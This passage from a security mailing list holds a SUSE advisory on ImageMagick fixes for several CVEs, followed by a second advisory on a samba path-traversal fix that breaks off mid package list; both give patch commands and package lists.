SUSE Security Update: Security update for ImageMagick ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1033-1 Rating: moderate References: #1106989 #1106996 #1107609 #1120381 #1122033 #1124365 #1124366 #1124368 #1128649 #1130330 #1131317 #1132053 #1132054 #1132060 Cross-References: CVE-2018-16412 CVE-2018-16413 CVE-2018-16644 CVE-2018-20467 CVE-2019-10650 CVE-2019-11007 CVE-2019-11008 CVE-2019-11009 CVE-2019-7175 CVE-2019-7395 CVE-2019-7397 CVE-2019-7398 CVE-2019-9956 Affected Products: SUSE OpenStack Cloud 7 SUSE Linux Enterprise Workstation Extension 12-SP4 SUSE Linux Enterprise Workstation Extension 12-SP3 SUSE Linux Enterprise Software Development Kit 12-SP4 SUSE Linux Enterprise Software Development Kit 12-SP3 SUSE Linux Enterprise Server for SAP 12-SP2 SUSE Linux Enterprise Server 12-SP4 SUSE Linux Enterprise Server 12-SP3 SUSE Linux Enterprise Server 12-SP2-LTSS SUSE Linux Enterprise Server 12-SP2-BCL SUSE Linux Enterprise Server 12-SP1-LTSS SUSE Linux Enterprise Server 12-LTSS SUSE Linux Enterprise Desktop 12-SP4 SUSE Linux Enterprise Desktop 12-SP3 SUSE Enterprise Storage 4 ______________________________________________________________________________ An update that solves 13 vulnerabilities and has one errata is now available. Description: This update for ImageMagick fixes the following issues: Security issues fixed: - CVE-2019-9956: Fixed a stack-based buffer overflow in PopHexPixel() (bsc#1130330). - CVE-2019-10650: Fixed a heap-based buffer over-read in WriteTIFFImage() (bsc#1131317). - CVE-2019-7175: Fixed multiple memory leaks in DecodeImage function (bsc#1128649). - CVE-2018-20467: Fixed infinite loop in coders/bmp.c (bsc#1120381). - CVE-2019-7398: Fixed a memory leak in the function WriteDIBImage (bsc#1124365). - CVE-2019-7397: Fixed a memory leak in the function WritePDFImage (bsc#1124366). - CVE-2019-7395: Fixed a memory leak in the function WritePSDChannel (bsc#1124368). - CVE-2018-16413: Fixed a heap-based buffer over-read in PushShortPixel() (bsc#1106989). - CVE-2018-16412: Fixed a heap-based buffer over-read in ParseImageResourceBlocks() (bsc#1106996). - CVE-2018-16644: Fixed a regression in dcm coder (bsc#1107609). - CVE-2019-11007: Fixed a heap-based buffer overflow in ReadMNGImage() (bsc#1132060). - CVE-2019-11008: Fixed a heap-based buffer overflow in WriteXWDImage() (bsc#1132054). - CVE-2019-11009: Fixed a heap-based buffer over-read in ReadXWDImage() (bsc#1132053). - Added extra -config- packages with Postscript/EPS/PDF readers still enabled. Removing the PS decoders is used to harden ImageMagick against security issues within ghostscript. Enabling them might impact security. (bsc#1122033) These are two packages that can be selected: - ImageMagick-config-6-SUSE: This has the PS decoders disabled. - ImageMagick-config-6-upstream: This has the PS decoders enabled. Depending on your local needs install either one of them. The default is the -SUSE configuration. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE OpenStack Cloud 7: zypper in -t patch SUSE-OpenStack-Cloud-7-2019-1033=1 - SUSE Linux Enterprise Workstation Extension 12-SP4: zypper in -t patch SUSE-SLE-WE-12-SP4-2019-1033=1 - SUSE Linux Enterprise Workstation Extension 12-SP3: zypper in -t patch SUSE-SLE-WE-12-SP3-2019-1033=1 - SUSE Linux Enterprise Software Development Kit 12-SP4: zypper in -t patch SUSE-SLE-SDK-12-SP4-2019-1033=1 - SUSE Linux Enterprise Software Development Kit 12-SP3: zypper in -t patch SUSE-SLE-SDK-12-SP3-2019-1033=1 - SUSE Linux Enterprise Server for SAP 12-SP2: zypper in -t patch SUSE-SLE-SAP-12-SP2-2019-1033=1 - SUSE Linux Enterprise Server 12-SP4: zypper in -t patch SUSE-SLE-SERVER-12-SP4-2019-1033=1 - SUSE Linux Enterprise Server 12-SP3: zypper in -t patch SUSE-SLE-SERVER-12-SP3-2019-1033=1 - SUSE Linux Enterprise Server 12-SP2-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP2-2019-1033=1 - SUSE Linux Enterprise Server 12-SP2-BCL: zypper in -t patch SUSE-SLE-SERVER-12-SP2-BCL-2019-1033=1 - SUSE Linux Enterprise Server 12-SP1-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-SP1-2019-1033=1 - SUSE Linux Enterprise Server 12-LTSS: zypper in -t patch SUSE-SLE-SERVER-12-2019-1033=1 - SUSE Linux Enterprise Desktop 12-SP4: zypper in -t patch SUSE-SLE-DESKTOP-12-SP4-2019-1033=1 - SUSE Linux Enterprise Desktop 12-SP3: zypper in -t patch SUSE-SLE-DESKTOP-12-SP3-2019-1033=1 - SUSE Enterprise Storage 4: zypper in -t patch SUSE-Storage-4-2019-1033=1 Package List: - SUSE OpenStack Cloud 7 (s390x x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Workstation Extension 12-SP4 (x86_64): ImageMagick-6.8.8.1-71.108.1 ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagick++-6_Q16-3-6.8.8.1-71.108.1 libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-32bit-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-71.108.1 - SUSE Linux Enterprise Workstation Extension 12-SP3 (x86_64): ImageMagick-6.8.8.1-71.108.1 ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagick++-6_Q16-3-6.8.8.1-71.108.1 libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-32bit-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-71.108.1 - SUSE Linux Enterprise Software Development Kit 12-SP4 (aarch64 ppc64le s390x x86_64): ImageMagick-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 ImageMagick-devel-6.8.8.1-71.108.1 libMagick++-6_Q16-3-6.8.8.1-71.108.1 libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1 libMagick++-devel-6.8.8.1-71.108.1 perl-PerlMagick-6.8.8.1-71.108.1 perl-PerlMagick-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Software Development Kit 12-SP3 (aarch64 ppc64le s390x x86_64): ImageMagick-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 ImageMagick-devel-6.8.8.1-71.108.1 libMagick++-6_Q16-3-6.8.8.1-71.108.1 libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1 libMagick++-devel-6.8.8.1-71.108.1 perl-PerlMagick-6.8.8.1-71.108.1 perl-PerlMagick-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Server for SAP 12-SP2 (ppc64le x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Server 12-SP4 (aarch64 ppc64le s390x x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Server 12-SP3 (aarch64 ppc64le s390x x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Server 12-SP2-LTSS (ppc64le s390x x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Server 12-SP2-BCL (x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Server 12-SP1-LTSS (ppc64le s390x x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Server 12-LTSS (ppc64le s390x x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Desktop 12-SP4 (x86_64): ImageMagick-6.8.8.1-71.108.1 ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagick++-6_Q16-3-6.8.8.1-71.108.1 libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-32bit-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Linux Enterprise Desktop 12-SP3 (x86_64): ImageMagick-6.8.8.1-71.108.1 ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagick++-6_Q16-3-6.8.8.1-71.108.1 libMagick++-6_Q16-3-debuginfo-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-32bit-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-32bit-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 - SUSE Enterprise Storage 4 (x86_64): ImageMagick-config-6-SUSE-6.8.8.1-71.108.1 ImageMagick-config-6-upstream-6.8.8.1-71.108.1 ImageMagick-debuginfo-6.8.8.1-71.108.1 ImageMagick-debugsource-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-6.8.8.1-71.108.1 libMagickCore-6_Q16-1-debuginfo-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-6.8.8.1-71.108.1 libMagickWand-6_Q16-1-debuginfo-6.8.8.1-71.108.1 References: https://www.suse.com/security/cve/CVE-2018-16412.html https://www.suse.com/security/cve/CVE-2018-16413.html https://www.suse.com/security/cve/CVE-2018-16644.html https://www.suse.com/security/cve/CVE-2018-20467.html https://www.suse.com/security/cve/CVE-2019-10650.html https://www.suse.com/security/cve/CVE-2019-11007.html https://www.suse.com/security/cve/CVE-2019-11008.html https://www.suse.com/security/cve/CVE-2019-11009.html https://www.suse.com/security/cve/CVE-2019-7175.html https://www.suse.com/security/cve/CVE-2019-7395.html https://www.suse.com/security/cve/CVE-2019-7397.html https://www.suse.com/security/cve/CVE-2019-7398.html https://www.suse.com/security/cve/CVE-2019-9956.html https://bugzilla.suse.com/1106989 https://bugzilla.suse.com/1106996 https://bugzilla.suse.com/1107609 https://bugzilla.suse.com/1120381 https://bugzilla.suse.com/1122033 https://bugzilla.suse.com/1124365 https://bugzilla.suse.com/1124366 https://bugzilla.suse.com/1124368 https://bugzilla.suse.com/1128649 https://bugzilla.suse.com/1130330 https://bugzilla.suse.com/1131317 https://bugzilla.suse.com/1132053 https://bugzilla.suse.com/1132054 https://bugzilla.suse.com/1132060 From sle-security-updates at lists.suse.com Thu Apr 25 16:09:04 2019 From: sle-security-updates at lists.suse.com (sle-security-updates at lists.suse.com) Date: Fri, 26 Apr 2019 00:09:04 +0200 (CEST) Subject: SUSE-SU-2019:1040-1: important: Security update for samba Message-ID: <20190425220904.45C04F3DB@maintenance.suse.de> SUSE Security Update: Security update for samba ______________________________________________________________________________ Announcement ID: SUSE-SU-2019:1040-1 Rating: important References: #1114407 #1124223 #1125410 #1126377 #1131060 #1131686 Cross-References: CVE-2019-3880 Affected Products: SUSE Linux Enterprise Module for Packagehub Subpackages 15 SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 SUSE Linux Enterprise Module for Development Tools 15 SUSE Linux Enterprise Module for Desktop Applications 15 SUSE Linux Enterprise Module for Basesystem 15 SUSE Linux Enterprise High Availability 15 ______________________________________________________________________________ An update that solves one vulnerability and has 5 fixes is now available. Description: This update for samba fixes the following issues: Security issue fixed: - CVE-2019-3880: Fixed a path/symlink traversal vulnerability, which allowed an unprivileged user to save registry files outside a share (bsc#1131060). ldb was updated to version 1.2.4 (bsc#1125410 bsc#1131686): - Out of bound read in ldb_wildcard_compare - Hold at most 10 outstanding paged result cookies - Put "results_store" into a doubly linked list - Refuse to build Samba against a newer minor version of ldb Non-security issues fixed: - Fixed update-apparmor-samba-profile script after apparmor switched to using named profiles (bsc#1126377). - Abide to the load_printers parameter in smb.conf (bsc#1124223). - Provide the 32bit samba winbind PAM module and its dependend 32bit libraries. Patch Instructions: To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or "zypper patch". Alternatively you can run the command listed for your product: - SUSE Linux Enterprise Module for Packagehub Subpackages 15: zypper in -t patch SUSE-SLE-Module-Packagehub-Subpackages-15-2019-1040=1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-OBS-15-2019-1040=1 - SUSE Linux Enterprise Module for Development Tools 15: zypper in -t patch SUSE-SLE-Module-Development-Tools-15-2019-1040=1 - SUSE Linux Enterprise Module for Desktop Applications 15: zypper in -t patch SUSE-SLE-Module-Desktop-Applications-15-2019-1040=1 - SUSE Linux Enterprise Module for Basesystem 15: zypper in -t patch SUSE-SLE-Module-Basesystem-15-2019-1040=1 - SUSE Linux Enterprise High Availability 15: zypper in -t patch SUSE-SLE-Product-HA-15-2019-1040=1 Package List: - SUSE Linux Enterprise Module for Packagehub Subpackages 15 (aarch64 ppc64le s390x x86_64): avahi-debuginfo-0.6.32-5.5.3 avahi-debugsource-0.6.32-5.5.3 python-avahi-0.6.32-5.5.3 samba-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-debugsource-4.7.11+git.153.b36ceaf2235-4.27.1 samba-python-4.7.11+git.153.b36ceaf2235-4.27.1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (aarch64 ppc64le s390x x86_64): avahi-debuginfo-0.6.32-5.5.3 avahi-debugsource-0.6.32-5.5.3 avahi-glib2-debugsource-0.6.32-5.5.8 ctdb-pcp-pmda-4.7.11+git.153.b36ceaf2235-4.27.1 ctdb-pcp-pmda-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 ctdb-tests-4.7.11+git.153.b36ceaf2235-4.27.1 ctdb-tests-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 gnutls-debuginfo-3.6.2-6.5.4 gnutls-debugsource-3.6.2-6.5.4 gnutls-guile-3.6.2-6.5.4 gnutls-guile-debuginfo-3.6.2-6.5.4 ldb-debugsource-1.2.4-3.12.1 ldb-tools-1.2.4-3.12.1 ldb-tools-debuginfo-1.2.4-3.12.1 libnettle-debugsource-3.4.1-4.9.1 nettle-3.4.1-4.9.1 nettle-debuginfo-3.4.1-4.9.1 python-avahi-0.6.32-5.5.3 python-avahi-gtk-0.6.32-5.5.8 python-tdb-1.3.15-3.6.3 python-tdb-debuginfo-1.3.15-3.6.3 python-tevent-0.9.36-4.10.3 python-tevent-debuginfo-0.9.36-4.10.3 python3-tdb-1.3.15-3.6.3 python3-tdb-debuginfo-1.3.15-3.6.3 python3-tevent-0.9.36-4.10.3 python3-tevent-debuginfo-0.9.36-4.10.3 samba-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 samba-debugsource-4.7.11+git.153.b36ceaf2235-4.27.1 samba-python-4.7.11+git.153.b36ceaf2235-4.27.1 samba-test-4.7.11+git.153.b36ceaf2235-4.27.1 samba-test-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 tdb-debugsource-1.3.15-3.6.3 tevent-debugsource-0.9.36-4.10.3 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (x86_64): libnettle-devel-32bit-3.4.1-4.9.1 - SUSE Linux Enterprise Module for Open Buildservice Development Tools 15 (noarch): samba-doc-4.7.11+git.153.b36ceaf2235-4.27.1 - SUSE Linux Enterprise Module for Development Tools 15 (aarch64 ppc64le s390x x86_64): cups-ddk-2.2.7-3.11.7 cups-ddk-debuginfo-2.2.7-3.11.7 cups-debuginfo-2.2.7-3.11.7 cups-debugsource-2.2.7-3.11.7 - SUSE Linux Enterprise Module for Desktop Applications 15 (aarch64 ppc64le s390x x86_64): avahi-autoipd-0.6.32-5.5.3 avahi-autoipd-debuginfo-0.6.32-5.5.3 avahi-debuginfo-0.6.32-5.5.3 avahi-debugsource-0.6.32-5.5.3 avahi-glib2-debugsource-0.6.32-5.5.8 avahi-utils-gtk-0.6.32-5.5.8 avahi-utils-gtk-debuginfo-0.6.32-5.5.8 libavahi-gobject-devel-0.6.32-5.5.8 - SUSE Linux Enterprise Module for Desktop Applications 15 (x86_64): avahi-32bit-debuginfo-0.6.32-5.5.3 cups-debugsource-2.2.7-3.11.7 gnutls-debugsource-3.6.2-6.5.4 libavahi-client3-32bit-0.6.32-5.5.3 libavahi-client3-32bit-debuginfo-0.6.32-5.5.3 libavahi-common3-32bit-0.6.32-5.5.3 libavahi-common3-32bit-debuginfo-0.6.32-5.5.3 libcups2-32bit-2.2.7-3.11.7 libcups2-32bit-debuginfo-2.2.7-3.11.7 libgnutls30-32bit-3.6.2-6.5.4 libgnutls30-32bit-debuginfo-3.6.2-6.5.4 libhogweed4-32bit-3.4.1-4.9.1 libhogweed4-32bit-debuginfo-3.4.1-4.9.1 libnettle-debugsource-3.4.1-4.9.1 libnettle6-32bit-3.4.1-4.9.1 libnettle6-32bit-debuginfo-3.4.1-4.9.1 libp11-kit0-32bit-0.23.2-4.2.1 libp11-kit0-32bit-debuginfo-0.23.2-4.2.1 libtasn1-6-32bit-4.13-4.2.1 libtasn1-6-32bit-debuginfo-4.13-4.2.1 libtasn1-debugsource-4.13-4.2.1 p11-kit-32bit-debuginfo-0.23.2-4.2.1 p11-kit-debugsource-0.23.2-4.2.1 - SUSE Linux Enterprise Module for Basesystem 15 (aarch64 ppc64le s390x x86_64): avahi-0.6.32-5.5.3 avahi-compat-howl-devel-0.6.32-5.5.3 avahi-compat-mDNSResponder-devel-0.6.32-5.5.3 avahi-debuginfo-0.6.32-5.5.3 avahi-debugsource-0.6.32-5.5.3 avahi-glib2-debugsource-0.6.32-5.5.8 avahi-utils-0.6.32-5.5.3 avahi-utils-debuginfo-0.6.32-5.5.3 cups-2.2.7-3.11.7 cups-client-2.2.7-3.11.7 cups-client-debuginfo-2.2.7-3.11.7 cups-config-2.2.7-3.11.7 cups-debuginfo-2.2.7-3.11.7 cups-debugsource-2.2.7-3.11.7 cups-devel-2.2.7-3.11.7 gamin-devel-0.1.10-3.2.3 gamin-devel-debugsource-0.1.10-3.2.3 gnutls-3.6.2-6.5.4 gnutls-debuginfo-3.6.2-6.5.4 gnutls-debugsource-3.6.2-6.5.4 ldb-debugsource-1.2.4-3.12.1 libavahi-client3-0.6.32-5.5.3 libavahi-client3-debuginfo-0.6.32-5.5.3 libavahi-common3-0.6.32-5.5.3 libavahi-common3-debuginfo-0.6.32-5.5.3 libavahi-core7-0.6.32-5.5.3 libavahi-core7-debuginfo-0.6.32-5.5.3 libavahi-devel-0.6.32-5.5.3 libavahi-glib-devel-0.6.32-5.5.8 libavahi-glib1-0.6.32-5.5.8 libavahi-glib1-debuginfo-0.6.32-5.5.8 libavahi-gobject0-0.6.32-5.5.8 libavahi-gobject0-debuginfo-0.6.32-5.5.8 libavahi-ui-gtk3-0-0.6.32-5.5.8 libavahi-ui-gtk3-0-debuginfo-0.6.32-5.5.8 libavahi-ui0-0.6.32-5.5.8 libavahi-ui0-debuginfo-0.6.32-5.5.8 libcups2-2.2.7-3.11.7 libcups2-debuginfo-2.2.7-3.11.7 libcupscgi1-2.2.7-3.11.7 libcupscgi1-debuginfo-2.2.7-3.11.7 libcupsimage2-2.2.7-3.11.7 libcupsimage2-debuginfo-2.2.7-3.11.7 libcupsmime1-2.2.7-3.11.7 libcupsmime1-debuginfo-2.2.7-3.11.7 libcupsppdc1-2.2.7-3.11.7 libcupsppdc1-debuginfo-2.2.7-3.11.7 libdcerpc-binding0-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc-binding0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc-samr-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc-samr0-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc-samr0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc0-4.7.11+git.153.b36ceaf2235-4.27.1 libdcerpc0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libdns_sd-0.6.32-5.5.3 libdns_sd-debuginfo-0.6.32-5.5.3 libfam0-gamin-0.1.10-3.2.3 libfam0-gamin-debuginfo-0.1.10-3.2.3 libgamin-1-0-0.1.10-3.2.3 libgamin-1-0-debuginfo-0.1.10-3.2.3 libgnutls-devel-3.6.2-6.5.4 libgnutls30-3.6.2-6.5.4 libgnutls30-debuginfo-3.6.2-6.5.4 libgnutlsxx-devel-3.6.2-6.5.4 libgnutlsxx28-3.6.2-6.5.4 libgnutlsxx28-debuginfo-3.6.2-6.5.4 libhogweed4-3.4.1-4.9.1 libhogweed4-debuginfo-3.4.1-4.9.1 libhowl0-0.6.32-5.5.3 libhowl0-debuginfo-0.6.32-5.5.3 libldb-devel-1.2.4-3.12.1 libldb1-1.2.4-3.12.1 libldb1-debuginfo-1.2.4-3.12.1 libndr-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-krb5pac-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-krb5pac0-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-krb5pac0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-nbt-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-nbt0-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-nbt0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-standard-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-standard0-4.7.11+git.153.b36ceaf2235-4.27.1 libndr-standard0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libndr0-4.7.11+git.153.b36ceaf2235-4.27.1 libndr0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libnetapi-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libnetapi0-4.7.11+git.153.b36ceaf2235-4.27.1 libnetapi0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libnettle-debugsource-3.4.1-4.9.1 libnettle-devel-3.4.1-4.9.1 libnettle6-3.4.1-4.9.1 libnettle6-debuginfo-3.4.1-4.9.1 libp11-kit0-0.23.2-4.2.1 libp11-kit0-debuginfo-0.23.2-4.2.1 libsamba-credentials-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-credentials0-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-credentials0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-errors-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-errors0-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-errors0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-hostconfig-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-hostconfig0-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-hostconfig0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-passdb-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-passdb0-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-passdb0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-policy-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-policy0-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-util-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-util0-4.7.11+git.153.b36ceaf2235-4.27.1 libsamba-util0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsamdb-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsamdb0-4.7.11+git.153.b36ceaf2235-4.27.1 libsamdb0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbclient-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbclient0-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbclient0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbconf-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbconf0-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbconf0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbldap-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbldap2-4.7.11+git.153.b36ceaf2235-4.27.1 libsmbldap2-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libtalloc-devel-2.1.11-3.5.3 libtalloc2-2.1.11-3.5.3 libtalloc2-debuginfo-2.1.11-3.5.3 libtasn1-4.13-4.2.1 libtasn1-6-4.13-4.2.1 libtasn1-6-debuginfo-4.13-4.2.1 libtasn1-debuginfo-4.13-4.2.1 libtasn1-debugsource-4.13-4.2.1 libtasn1-devel-4.13-4.2.1 libtdb-devel-1.3.15-3.6.3 libtdb1-1.3.15-3.6.3 libtdb1-debuginfo-1.3.15-3.6.3 libtevent-devel-0.9.36-4.10.3 libtevent-util-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libtevent-util0-4.7.11+git.153.b36ceaf2235-4.27.1 libtevent-util0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 libtevent0-0.9.36-4.10.3 libtevent0-debuginfo-0.9.36-4.10.3 libwbclient-devel-4.7.11+git.153.b36ceaf2235-4.27.1 libwbclient0-4.7.11+git.153.b36ceaf2235-4.27.1 libwbclient0-debuginfo-4.7.11+git.153.b36ceaf2235-4.27.1 p11-kit-0.23.2-4.2.1 p11-kit-debuginfo-0.23.2-4.2.1 p11-kit-debugsource-0.23.2-4.2.1 p11-kit-devel-0.23.2-4.2.1 p11-kit-nss-trust-0.23.2-4.2.1 